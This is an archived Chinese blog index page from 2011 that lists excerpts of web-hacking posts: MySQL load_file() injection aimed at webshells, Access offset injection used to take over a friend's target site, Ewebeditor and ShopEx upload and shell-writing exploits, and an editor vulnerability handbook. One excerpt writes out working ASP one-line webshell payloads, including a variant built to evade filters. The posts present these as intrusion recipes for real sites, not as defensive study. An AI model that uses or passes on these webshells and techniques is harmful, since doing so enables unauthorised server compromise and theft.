自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

收集盒 Book box

大多数文章收集自互联网

  • 博客(9)
  • 资源 (1)
  • 收藏
  • 关注

原创 MYSQL注入中load_file()函数的进一步应用

<br /><br />文章已发表于《黑客防线》2008年第11期 转载请注明<br /> <br />MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如:<br />/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件<br />/usr/local/apache2/conf/httpd.conf<br />/usr/local/app/apache2/conf/extra

2011-04-29 02:44:00 609

转载 巧妙利用表自联偏移注入ACC数据库拿webshell(图)

<br />今天下午一朋友丢来一个网站说喜欢这个网站的源码,看能不能拿下,拿下以后说请我去腐败腐败。既然他都开口了,嘿嘿我还正愁没机会狠狠的蹭他几下,谁知道他自己找上门来了,不蹭白不蹭。先打开主站,用的是个通用防注入系统,过滤的很严格,对get跟post都进行了严格的参数过滤,转换编码格式也没能绕过注入系统,cookie注入也没能成功。后台也不能登陆,看来只能用旁注了。(如果有哪位大牛能突破这个通用防注入系统的话,不防发出来大家共享一下。)又拿出AK48,推荐一下这个工具,觉得比旁注王要好用一点,先有AK4

2011-04-25 18:40:00 1042

原创 Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL

<br />以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。<br />前几天看到ewebeditor有漏洞的文章才想起那个网站原来用的也是ewebeditor。今天仔细看了看,发现问题了(2.1

2011-04-21 20:11:00 1200

原创 一句话木马及几种可绕过过滤格式

<br /><br />ASP一句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的一句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"

2011-04-12 23:59:00 3836

原创 Aio.exe用法

All In One(AIO) V1.0 Build 06/10/2006 By WinEggDrop 这是一个将很多小工具功能集成一体的一个"工具". (如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本) 功能: 1.AutoRun -> 查看一般登陆后启动的项 用法:Aio.exe -AutoRun 2.Clone -> 克隆帐户

2011-04-12 23:42:00 1426

原创 MYSQL导出查询结果到文件

<br />SELECT order_id,product_name,qty FROM orders INTO OUTFILE '/data/data.txt'<br /> <br /><br />SELECT order_id,product_name,qty<br />    FROM orders<br />    INTO OUTFILE '/tmp/orders.csv'<br />        FIELDS TERMINATED BY ','<br />        ENCLOSED BY 

2011-04-06 23:09:00 632

原创 shopex 4.8.5.45144注入和远程shell写入漏洞

利用代码exp:exploit.htm-----

2011-04-04 16:23:00 2672

原创 网页编辑器漏洞手册

<br /><br />FCKeditor<br />FCKeditor编辑器页/查看编辑器版本/查看文件上传路径<br />FCKeditor编辑器页<br />FCKeditor/_samples/default.html<br />查看编辑器版本<br />FCKeditor/_whatsnew.html<br />查看文件上传路径<br />fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Comman

2011-04-04 15:01:00 1157

原创 ewebeditor不登陆后台也有机会拿shell

在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。查找到这段:把那个s_light换成你刚才看到的样式名字,然后把链接补全。

2011-04-02 17:06:00 1002

青云服务器安全设置器V2011正式版

青云服务器安全设置器V2011正式版 官方下载地址是http://ntsafe.com/html/zhanchanggongju/chanpinruanjian/20110214/1516.html

2011-09-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除